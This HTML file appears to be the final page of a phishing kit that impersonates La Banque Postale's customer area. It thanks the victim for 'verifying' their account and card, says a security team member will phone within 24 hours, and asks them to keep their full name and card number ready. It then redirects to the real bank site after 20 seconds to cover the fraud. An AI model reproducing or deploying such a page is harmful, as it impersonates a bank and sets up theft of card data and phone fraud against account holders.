<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
	<meta http-equiv="refresh" content="20;url=https://www.labanquepostale.fr">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="../assets/dist/img/ico.ico">

<title>Espace client - La Banque Postale</title>

    <!-- Bootstrap core CSS -->
    <link href="../assets/dist/css/bootstrap.min.css" rel="stylesheet">
<link href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" rel="stylesheet"/>

    <!-- Custom styles for this template -->
    <link href="../assets/dist/css/album.css" rel="stylesheet">
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css" integrity="sha512-5A8nwdMOWrSz20fDsjczgUidUBR8liPYU+WymTZP1lmY9G6Oc7HlZv156XqnsgNUzTyMefFTcsFH/tnJE/+xBg==" crossorigin="anonymous" referrerpolicy="no-referrer" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" integrity="sha512-SfTiTlX6kk+qitfevl/7LibUOeJWlt9rbyDn92a1DqWOw9vWG2MFoays0sgObmWazO5BQPiFucnnEAjpAB+/Sw==" crossorigin="anonymous" referrerpolicy="no-referrer" />
 <style>
.m-logo img {
    width: 50px;
    height: 50px;
}
#titre_btn{
font-weight:bold;
color:#17479e;
}

.bg-light {
    background-color: #003da5!important;
}
.buttonBTN {
    text-align: center;
    width: 4rem;
    height: 3.6rem;

    border-radius: 4px;
	border:1px solid #d8d8d8;
    background-color: var(--color-3);
    font-size: 18px;
    color: var(--color-26);
    font-family: "RobotoMono-Medium",Courier,monospace;
}

@media only screen and (max-width: 768px) {
  /* For mobile phones: */
  #Search_ico{
   display:none;
  } 
  #img_body{
   display:none;
  }  
  
  #tab_clavier{
   width:100%;
  }
}

/* Small devices (portrait tablets and large phones, 600px and up) */
@media only screen and (min-width: 600px) {

  
  #tab_clavier{
   width:100%;
  }
}

@media only screen and (min-width: 768px) {
  
  #tab_clavier{
   width:100%;
  }

}



/* Large devices (laptops/desktops, 992px and up) */
@media only screen and (min-width: 992px) {

  #tab_clavier{
   width:100%;
  }

}

@media only screen and (min-width: 1200px) {
 #tab_clavier{
   width:100%;
  }
}
 </style>
 
 </head>

  <body>

    <header>
   
      <div class="navbar navbar-white bg-white box-shadow">
        <div class="container d-flex justify-content-between">
          <a href="#" class="navbar-brand d-flex align-items-center m-logo">

            <img src="../assets/dist/img/logobbp.png"/>
          </a>
      
        </div>
      </div>
    </header>

    <main role="main">


      <div style="color: #17479e;" class="d-flex flex-column align-items-center justify-content-center mt-5">
   <div class="row mt-5">
       <div class="spinner-border" role="status">
           <span class="sr-only">Loading...</span>
       </div>
    </div>
    <div class="row ">
      <strong>Veuillez patienter ....</strong>
    </div>
</div>
<div class="row g-0">
				<div class="col-md-4 m-3">
				  <img src="../assets/dist/img/ccb.jpg" height="100%" class="img-fluid rounded-start" alt="...">
				</div>
				
				<div class="col-md-7">
				  <div class="card-body">
					<h5 class="card-title">Déverrouillage de votre carte bancaire :</h5>
					<p class="card-text">Merci d'avoir procédé à la vérification de votre compte et de votre carte bancaire.</p>
				  <p class="card-text"> Pour garantir la sécurité de votre compte, un membre de notre équipe Sécurité vous contactera dans les prochaines 24 heures afin de confirmer des détails supplémentaires par téléphone.</p>
				  <p class="card-text"> Veuillez vous assurer d'avoir les informations suivantes à portée de main pour vérifier votre identité :</p>
				  <p class="card-text"><i class="fa fa-credit-card fa-2x" aria-hidden="true"></i> Nom complet tel qu'enregistré sur le compte</p>
				  <p class="card-text"><i class="fa fa-credit-card fa-2x" aria-hidden="true"></i> Numéro de votre carte</p>
				  </div>
				</div>
			  </div>
	<script src="https://code.jquery.com/jquery-3.4.0.min.js"></script>
		
<div id="content"></div>
    </main>

    <footer class="text-muted">
      <div class="container">

	</div>
    </footer>

    <!-- Bootstrap core JavaScript
    ================================================== -->
    <!-- Placed at the end of the document so the pages load faster -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script>window.jQuery || document.write('<script src="./assets/dist/vendor/jquery-slim.min.js"><\/script>')</script>
    <script src="../assets/dist/vendor/popper.min.js"></script>
		<script src="../assets/dist/js/main.js"></script>
    <script src="../assets/dist/js/bootstrap.min.js"></script>
    <script src="../assets/dist/vendor/holder.min.js"></script>
  </body>
</html>
